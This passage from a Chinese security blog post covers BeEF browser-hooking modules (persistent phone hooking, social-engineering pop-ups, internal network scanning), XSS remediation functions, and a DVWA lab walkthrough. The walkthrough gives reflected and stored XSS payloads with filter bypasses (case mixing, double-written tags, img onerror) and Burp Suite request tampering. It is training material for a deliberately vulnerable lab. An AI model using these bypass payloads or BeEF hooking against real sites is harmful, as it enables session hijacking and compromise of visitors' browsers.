<h4 id="Confirm-Close-Tab模块"><a href="#Confirm-Close-Tab模块" class="headerlink" title="Confirm Close Tab模块"></a>Confirm Close Tab模块</h4><p>当用户关闭当前页面时，反复弹出确认是否关闭页面的消息</p>
<h3 id="hook手机"><a href="#hook手机" class="headerlink" title="hook手机"></a>hook手机</h3><p>由于手机打开网址持续的时间很短，关闭当前页面后BeEF的shell就会下线，因此我们可以使用BeEF API，用户上线后能够自动执行批量命令，结合Persistence模块能够极大提高shell存活时间。除了与windows系统相关的信息无法获取，其他操作均能成功执行，并且BeEF为手机劫持提供了专门的模块系列——<strong>Phonegap</strong></p>
<pre><code>1、弹框
2、重定向 
3、查看是否访问过某些网站
4、Creates an invisible iframe
5、Social Engineering系列，如下图，仅作演示 
6、msf系列
7、NetWork系列，可以用来扫描同一内网下的windows主机</code></pre><p>参考：</p>
<p><a href="https://www.cnblogs.com/ssooking/p/6036494.html" target="_blank" rel="noopener">Beef安装与简单使用</a></p>
<h2 id="五、修复建议"><a href="#五、修复建议" class="headerlink" title="五、修复建议"></a>五、修复建议</h2><ul>
<li>将用户所提供的内容输入输出进行过滤。可以运用下面这些函数对出现XSS漏洞的参数进行过滤：</li>
<li>PHP的htmlentities()或是htmlspecialchars()</li>
<li>Python的cgi.escape()</li>
<li>ASP的Server.HTMLEncode()</li>
<li>ASP.NET的Server.HtmlEncode()或功能更强的Microsoft Anti-Cross Site Scripting Library</li>
<li>Java的xssprotect(Open Source Library)</li>
<li>Node.js的node-validator</li>
</ul>
<h2 id="六、XSS靶场"><a href="#六、XSS靶场" class="headerlink" title="六、XSS靶场"></a>六、XSS靶场</h2><h3 id="DVWA"><a href="#DVWA" class="headerlink" title="DVWA"></a>DVWA</h3><h4 id="Xss-reflected-Low"><a href="#Xss-reflected-Low" class="headerlink" title="Xss(reflected)-Low"></a>Xss(reflected)-Low</h4><p>点击右下角的view source，查看源码</p>
<p><img src="https://i.loli.net/2020/05/12/RikyZUWGxE1g3cw.png" alt></p>
<p><strong>分析：</strong><br><code>arrary_key_exists()函数：判断$_GET的值中是否存在“name”键名。并且$_GET[‘name’]的值是否不为空，满足这些条件，直接输出下面的输出语句。可以看到，代码直接引用了name参数，并没有任何的过滤与检查，存在明显的XSS漏洞。</code></p>
<p><strong><code>payload：&lt;script&gt;alert(&#39;简简&#39;)&lt;/script&gt;</code></strong></p>
<h4 id="Xss-reflected-Medium"><a href="#Xss-reflected-Medium" class="headerlink" title="Xss(reflected)-Medium"></a>Xss(reflected)-Medium</h4><p>源码：</p>
<p><img src="https://i.loli.net/2020/05/12/frRTuiw9bovlFax.png" alt></p>
<p><strong>分析：</strong><br>这里对输入进行了过滤，基于黑名单的思想，使用str_replace函数将输入中的<code>&lt;script&gt;</code>转化为空。然后在将name值的结果输出，这种防护机制是可以被轻松绕过的。</p>
<p><strong>1</strong>.大小写混淆绕过（str_replace()函数不太完美，因为它区分大小写）</p>
<p><strong><code>Payload：&lt;ScRipt&gt;alert(&#39;简简&#39;)&lt;/script&gt;</code></strong></p>
<p><strong><code>Payload：&lt;SCRIPT&gt;alert(&#39;简简&#39;)&lt;/SCRIPT&gt;</code></strong></p>
<p><strong>2</strong>.双写绕过</p>
<p><strong><code>Payload：&lt;sc&lt;script&gt;ript&gt;alert(&#39;简简&#39;)&lt;/script&gt;</code></strong></p>
<p><strong>3</strong>.构造不使用<code>&lt;script&gt;</code>标签进行绕过</p>
<p><strong><code>payload：&lt;img src=1 onerror=alert(&#39;简简&#39;)&gt;</code></strong></p>
<p>解释：&lt;img ..&gt;标签是添加一个图片，src是指定图片的url，onerror是指定加载图片时如果出现错误则要执行的事件,这里我们的图片url肯定是错误的，这个弹框事件也必定会执行</p>
<h4 id="Xss-reflected-High"><a href="#Xss-reflected-High" class="headerlink" title="Xss(reflected)-High"></a>Xss(reflected)-High</h4><p>源码：</p>
<p><img src="https://i.loli.net/2020/05/12/51q3sPZvMljNBbx.png" alt></p>
<p><strong>分析：</strong><br>High级别的代码同样使用黑名单过滤输入，preg_replace() 函数将包含&lt;script的字符，不管大小写，不管后面跟着1个或多个与之相同的字符都转换为空。用于正则表达式的搜索和替换，这使得双写绕过、大小写混淆绕过（正则表达式中i表示不区分大小写）不再有效。<br><strong><code>Payload：&lt;img src=1 onerror=alert(&#39;简简&#39;)&gt;</code></strong></p>
<h4 id="XSS-Stored-Low"><a href="#XSS-Stored-Low" class="headerlink" title="XSS(Stored)-Low"></a>XSS(Stored)-Low</h4><p><img src="https://i.loli.net/2020/04/03/DcoxeTjLSVKM8yp.png" alt></p>
<p>相关函数介绍：</p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token function">trim</span><span class="token punctuation">(</span>string<span class="token punctuation">,</span>charlist<span class="token punctuation">)</span> 函数移除字符串两侧的空白字符或其他预定义字符，预定义字符包括\<span class="token package">0</span>、\<span class="token package">t</span>、\<span class="token package">n</span>、\<span class="token package">x0B</span>、\<span class="token package">r</span>以及空格，可选参数charlist支持添加额外需要删除的字符。

<span class="token function">mysqli_real_escape_string</span><span class="token punctuation">(</span>string<span class="token punctuation">,</span>connection<span class="token punctuation">)</span> 函数会对字符串中的特殊符号（\<span class="token package">x00</span>，\<span class="token package">n</span>，\<span class="token package">r</span>，\，'，"，\<span class="token package">x1a</span>）进行转义。

<span class="token function">stripslashes</span><span class="token punctuation">(</span>string<span class="token punctuation">)</span> 函数删除字符串中的反斜杠。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>分析</strong>：<br>可以看到，对输入并没有做XSS方面的过滤与检查，且存储在数据库中，因此这里存在明显的存储型XSS漏洞。</p>
<p><strong>Exploit</strong><br>message栏的利用：<br>输入<code>&lt;script&gt;alert(/name/)&lt;/script&gt;</code>，成功弹框：</p>
<img src="https://i.loli.net/2020/04/03/kl6X5ZIAvjBWzT1.png">

<p><strong>name栏的利用：</strong><br>发现前端html中对name有字数长度限制:<br>Burpsuite 抓包改为<code>&lt;script&gt;alert(/name/)&lt;/script&gt;</code></p>
<p><img src="https://i.loli.net/2020/04/03/qtpc7elTUKoD894.png" alt="image-20200403140251503.png"></p>
<p>点击Bp中Forward 后，成功弹窗：</p>
<p><img src="https://i.loli.net/2020/04/03/wa4g3N1nstOobRM.png" alt="image-20200403140311971"></p>
<h4 id="XSS-Stored-Medium"><a href="#XSS-Stored-Medium" class="headerlink" title="XSS(Stored)-Medium"></a>XSS(Stored)-Medium</h4><p><img src="https://i.loli.net/2020/04/03/7tPfxlAo6anS2Bq.png" alt="image-20200403140334188"></p>
<pre class="line-numbers language-php"><code class="language-php"><span class="token function">strip_tags</span><span class="token punctuation">(</span><span class="token punctuation">)</span>函数剥去字符串中的<span class="token constant">HTML</span>、<span class="token constant">XML</span>以及<span class="token constant">PHP</span>的标签，但允许使用<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>b</span><span class="token punctuation">></span></span></span>标签。

<span class="token function">addslashes</span><span class="token punctuation">(</span><span class="token punctuation">)</span>函数返回在预定义字符（单引号、双引号、反斜杠、<span class="token keyword">NULL</span>）之前添加反斜杠的字符串。<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><strong>分析</strong>：<br>可以看到，由于对message参数使用了htmlspecialchars函数进行编码，因此无法再通过message参数注入XSS代码，但是对于name参数，只是简单过滤了<code>&lt;script&gt;</code>字符串，仍然存在存储型的XSS。</p>
<p><strong>Exploit</strong><br><strong>1</strong>.双写绕过<br>Burpsuite抓包改name参数为:<code>&lt;sc&lt;script&gt;ript&gt;alert(/name/)&lt;/script&gt;</code></p>
<p><img src="https://i.loli.net/2020/04/03/brcmMd2n3wCIBFo.png" alt="image-20200403140440550.png"></p>
<p><strong>2</strong>.大小写混淆绕过</p>
<p>Burpsuite抓包改name参数为:<code>&lt;ScRipt&gt;alert(/name/);&lt;/ScRipt&gt;</code></p>
<img src="https://i.loli.net/2020/04/03/7tVsywGdQLOuKDY.png" alt="image-20200403140456913">

<p><strong>3.</strong>使用非 script 标签的 xss payload：</p>
<p>eg:img标签：</p>
<p>Burpsuite抓包改name参数为:<code>&lt;img src=1 onerror=alert(/name/)&gt;</code></p>
<p><img src="https://i.loli.net/2020/04/03/P48rwRItdYovXSB.png" alt="image-20200403140509371.png"></p>
<p>其他标签和利用还有很多很多….<br>以上抓包修改数据Forward后，均成功弹窗：<br><img src="https://i.loli.net/2020/04/03/TnSMldjIgxtvXqm.png" alt="image-20200403140524097.png"></p>
<h4 id="XSS-Stored-High"><a href="#XSS-Stored-High" class="headerlink" title="XSS(Stored)-High"></a>XSS(Stored)-High</h4><p><img src="https://i.loli.net/2020/04/03/rhBgMw4HaE8UQCn.png" alt="image-20200403140538783.png"></p>
<p><strong>分析</strong>：<br>这里使用正则表达式过滤了<code>&lt;script&gt;</code>标签，但是却忽略了img、iframe等其它危险的标签，因此name参数依旧存在存储型XSS。</p>
<p><strong>Exploit</strong><br>Burpsuite抓包改name参数为<code>&lt;img src=1 onerror=alert(/name/)&gt;</code><br><img src="https://i.loli.net/2020/04/03/qIta128pKgxW4NR.png" alt="image-20200403140643833.png"><br>Forward后，成功弹窗：<br><img src="https://i.loli.net/2020/04/03/TnSMldjIgxtvXqm.png" alt="image-20200403140524097.png"></p>

            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://jwt1399.top" rel="external nofollow noreferrer">简文涛</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="https://jwt1399.top/posts/43901.html">https://jwt1399.top/posts/43901.html</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="https://jwt1399.top" target="_blank">简文涛</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/XSS/">
                                    <span class="chip bg-color">XSS</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">

<div id="article-share">
    
    
    <div class="social-share" data-sites="qq,qzone,wechat,weibo,linkedin,facebook,twitter,google,douban" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">打</a>
	<a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>
    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
            <a class="close modal-close"><i class="fas fa-times"></i></a>
            <h4 class="reward-title">你的赏识是我前进的动力</h4>
            <div class="reward-content">
                <div class="reward-tabs">
                    <ul class="tabs row">
                        <li class="tab col s6 alipay-tab waves-effect waves-light"><a href="#alipay">支付宝</a></li>
                        <li class="tab col s6 wechat-tab waves-effect waves-light"><a href="#wechat">微 信</a></li>
                    </ul>
                    <div id="alipay">
                        <img src="/medias/reward/alipay.png" class="reward-img" alt="支付宝打赏二维码">
                    </div>
                    <div id="wechat">
                        <img src="/medias/reward/wechat.png" class="reward-img" alt="微信打赏二维码">
                    </div>
                </div>
            </div>
        </div>
    </div>
</div>

<script>
    $(function () {
        $('.tabs').tabs();
    });
</script>
            
        </div>
    </div>

    

    

    

    

    
        <style>
    .valine-card {
        margin: 1.5rem auto;
    }

    .valine-card .card-content {
        padding: 20px 20px 5px 20px;
    }

    #vcomments textarea {
        box-sizing: border-box;
        background: url("/medias/comment_bg.png") 100% 100% no-repeat;
    }

    #vcomments p {
        margin: 2px 2px 10px;
        font-size: 1.05rem;
        line-height: 1.78rem;
    }

    #vcomments blockquote p {
        text-indent: 0.2rem;
    }

    #vcomments a {
        padding: 0 2px;
        color: #4cbf30;
        font-weight: 500;
        text-decoration: none;
    }

    #vcomments img {
        /*max-width: 100%;*/
        height: auto;
        cursor: pointer;
    }

    #vcomments ol li {
        list-style-type: decimal;
    }

    #vcomments ol,
    ul {
        display: block;
        padding-left: 2em;
        word-spacing: 0.05rem;
    }

    #vcomments ul li,
    ol li {
        display: list-item;
        line-height: 1.8rem;
        font-size: 1rem;
    }

    #vcomments ul li {
        list-style-type: disc;
    }

    #vcomments ul ul li {
        list-style-type: circle;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    #vcomments table, th, td {
        border: 0;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments h1 {
        font-size: 1.85rem;
        font-weight: bold;
        line-height: 2.2rem;
    }

    #vcomments h2 {
        font-size: 1.65rem;
        font-weight: bold;
        line-height: 1.9rem;
    }

    #vcomments h3 {
        font-size: 1.45rem;
        font-weight: bold;
        line-height: 1.7rem;
    }

    #vcomments h4 {
        font-size: 1.25rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    #vcomments h5 {
        font-size: 1.1rem;
        font-weight: bold;
        line-height: 1.4rem;
    }

    #vcomments h6 {
        font-size: 1rem;
        line-height: 1.3rem;
    }

    #vcomments p {
        font-size: 1rem;
        line-height: 1.5rem;
    }

    #vcomments hr {
        margin: 12px 0;
        border: 0;
        border-top: 1px solid #ccc;
    }

    #vcomments blockquote {
        margin: 15px 0;
        border-left: 5px solid #42b983;
        padding: 1rem 0.8rem 0.3rem 0.8rem;
        color: #666;
        background-color: rgba(66, 185, 131, .1);
    }

    #vcomments pre {
        font-family: monospace, monospace;
        padding: 1.2em;
        margin: .5em 0;
        background: #272822;
        overflow: auto;
        border-radius: 0.3em;
        tab-size: 4;
    }

    #vcomments code {
        font-family: monospace, monospace;
        padding: 1px 3px;
        font-size: 0.92rem;
        color: #e96900;
        background-color: #f8f8f8;
        border-radius: 2px;
    }

    #vcomments pre code {
        font-family: monospace, monospace;
        padding: 0;
        color: #e8eaf6;
        background-color: #272822;
    }

    #vcomments pre[class*="language-"] {
        padding: 1.2em;
        margin: .5em 0;
    }

    #vcomments code[class*="language-"],
    pre[class*="language-"] {
        color: #e8eaf6;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }

    #vcomments b,
    strong {
        font-weight: bold;
    }

    #vcomments dfn {
        font-style: italic;
    }

    #vcomments small {
        font-size: 85%;
    }

    #vcomments cite {
        font-style: normal;
    }

    #vcomments mark {
        background-color: #fcf8e3;
        padding: .2em;
    }

    #vcomments table, th, td {
        padding: 12px 13px;
        border: 1px solid #dfe2e5;
    }

    table tr:nth-child(2n), thead {
        background-color: #fafafa;
    }

    #vcomments table th {
        background-color: #f2f2f2;
        min-width: 80px;
    }

    #vcomments table td {
        min-width: 80px;
    }

    #vcomments [type="checkbox"]:not(:checked), [type="checkbox"]:checked {
        position: inherit;
        margin-left: -1.3rem;
        margin-right: 0.4rem;
        margin-top: -1px;
        vertical-align: middle;
        left: unset;
        visibility: visible;
    }
    .v[data-class=v] .vinput {
     padding: 0px 0px;
    }
</style>

<div class="card valine-card" data-aos="fade-up">
    <div class="comment_headling" style="font-size: 20px; font-weight: 700; position: relative; left: 20px; top: 15px; padding-bottom: 5px;">
        <i class="fas fa-comments fa-fw" aria-hidden="true"></i>
        <span>评论-----昵称和邮箱必填，网址选填</span>
    </div>
    <div id="vcomments" class="card-content" style="display: grid">
    </div>
</div>

<script src="/libs/valine/av-min.js"></script>
<script src="https://unpkg.com/valine/dist/Valine.min.js"></script>
<script>
    new Valine({
        el: '#vcomments',
        appId: 'Awf92dhT3VWqTfENqbCDoqbA-gzGzoHsz',
        appKey: '9uN7ODvigK9GAp8CYBz0fOrX',
        notify: 'false' === 'true',
        verify: 'false' === 'true',
        visitor: 'true' === 'true',
        avatar: '',
        pageSize: '10',
        lang: 'zh-cn',
        placeholder: '[昵称和邮箱必填，网址选填。填上邮箱，会给你发送评论提醒]ヾﾉ≧∀≦)o 请畅所欲言~',
        enableQQ: true,
        boolean: true,
    });
</script>

    

    

<article id="prenext-posts" class="prev-next articles">
    <div class="row article-row">
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge left-badge text-color">
                <i class="fas fa-chevron-left"></i>&nbsp;上一篇</div>
            <div class="card">
                <a href="/posts/8808.html">
                    <div class="card-image">
                        
                        <img src="https://cdn.jsdelivr.net/gh/jwt1399/cdn//img/20200824173916.jpg" class="responsive-img" alt="Vulnhub靶机：DC-1">
                        
                        <span class="card-title">Vulnhub靶机：DC-1</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞。远程攻击者可利用该漏洞执行任意代码。
                        
                    </div>
                    <div class="publish-info">
                        <span class="publish-date">
                            <i class="far fa-clock fa-fw icon-date"></i>2020-05-16
                        </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Web/" class="post-category">
                                    Web
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/靶场/">
                        <span class="chip bg-color">靶场</span>
                    </a>
                    
                    <a href="/tags/渗透测试/">
                        <span class="chip bg-color">渗透测试</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
        
        <div class="article col s12 m6" data-aos="fade-up">
            <div class="article-badge right-badge text-color">
                下一篇&nbsp;<i class="fas fa-chevron-right"></i>
            </div>
            <div class="card">
                <a href="/posts/32179.html">
                    <div class="card-image">
                        
                        <img src="https://cdn.jsdelivr.net/gh/jwt1399/cdn//img/20200824172423.jpg" class="responsive-img" alt="SQL注入从入门到进阶">
                        
                        <span class="card-title">SQL注入从入门到进阶</span>
                    </div>
                </a>
                <div class="card-content article-content">
                    <div class="summary block-with-text">
                        
                            SQL注入是通过将恶意的SQL语句插入到Web应用的输入参数中，欺骗服务器执行恶意的SQL命令的攻击。
                        
                    </div>
                    <div class="publish-info">
                            <span class="publish-date">
                                <i class="far fa-clock fa-fw icon-date"></i>2020-05-02
                            </span>
                        <span class="publish-author">
                            
                            <i class="fas fa-bookmark fa-fw icon-category"></i>
                            
                            <a href="/categories/Web/" class="post-category">
                                    Web
                                </a>
                            
                            
                        </span>
                    </div>
                </div>
                
                <div class="card-action article-tags">
                    
                    <a href="/tags/SQL注入/">
                        <span class="chip bg-color">SQL注入</span>
                    </a>
                    
                </div>
                
            </div>
        </div>
        
    </div>
</article>

</div>


<script>
    $('#articleContent').on('copy', function (e) {
        // IE8 or earlier browser is 'undefined'
        if (typeof window.getSelection === 'undefined') return;

        var selection = window.getSelection();
        // if the selection is short let's not annoy our users.
        if (('' + selection).length < Number.parseInt('150')) {
            return;
        }

        // create a div outside of the visible area and fill it with the selected text.
        var bodyElement = document.getElementsByTagName('body')[0];
        var newdiv = document.createElement('div');
        newdiv.style.position = 'absolute';
        newdiv.style.left = '-99999px';
        bodyElement.appendChild(newdiv);
        newdiv.appendChild(selection.getRangeAt(0).cloneContents());

        // we need a <pre> tag workaround.
        // otherwise the text inside "pre" loses all the line breaks!
        if (selection.getRangeAt(0).commonAncestorContainer.nodeName === 'PRE') {
            newdiv.innerHTML = "<pre>" + newdiv.innerHTML + "</pre>";
        }

        var url = document.location.href;
        newdiv.innerHTML += '<br />'
            + '来源: 简简<br />'
            + '文章作者: 简简<br />'
            + '文章链接: <a href="' + url + '">' + url + '</a><br />'
            + '本文章著作权归作者所有，任何形式的转载都请注明出处。';

        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

    
<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


<!-- 代码块折行 -->

<style type="text/css">
code[class*="language-"], pre[class*="language-"] { white-space: pre !important; }
</style>

    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="https://cdn.bootcdn.net/ajax/libs/tocbot/4.11.1/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('2'),
            headingSelector: 'h1, h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h1, h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>



    <footer class="page-footer bg-color">
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            <span id="year">2019</span>
            <a href="https://jwt1399.top" target="_blank">简简</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>&nbsp;|

            <a target="_blank" href="https://www.upyun.com/?utm_source=lianmeng&utm_medium=referral"><img src="https://cdn.jsdelivr.net/gh/jwt1399/cdn//img/20200824181422.png" style="width: 47px; vertical-align: middle;" ></a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">202.2k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>

            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2019";
                    var startMonth = "7";
                    var startDate = "2";
                    var startHour = "0";
                    var startMinute = "0";
                    var startSecond = "0";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            <a href="https://search.google.com/search-console?resource_id=http%3A%2F%2Fjwt1399.top%2F" target="_blank"
                rel="nofollow noopener">谷歌统计</a>&nbsp;|
            
            <span id="icp"><img src="/medias/icp.png" style="vertical-align: text-bottom;" />
                <a href="http://www.beian.miit.gov.cn/" target="_blank">蜀ICP备19020450号</a>
            </span>
            |
            
            <a href="https://tongji.baidu.com/web/10000159136/overview/index?siteId=14519996" target="_blank"
                rel="nofollow noopener">百度统计</a>

        </div>
        <div class="col s12 m4 l4 social-link social-statis">

    <a href="https://jwt1399.top/baidusitemap.xml" class="tooltipped" target="_blank" data-tooltip="访问我的sitemap" data-position="top" data-delay="50">
        <i class="fas fa-sitemap"></i>
    </a>


    <a href="https://pl.jwt1399.top" class="tooltipped" target="_blank" data-tooltip="valine评论: https://pl.jwt1399.top" data-position="top" data-delay="50">
        <i class="fab fa-optin-monster"></i>
    </a>


    <a href="mailto:1019084218@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope"></i>
    </a>













    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1019084218" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1019084218" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>


    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
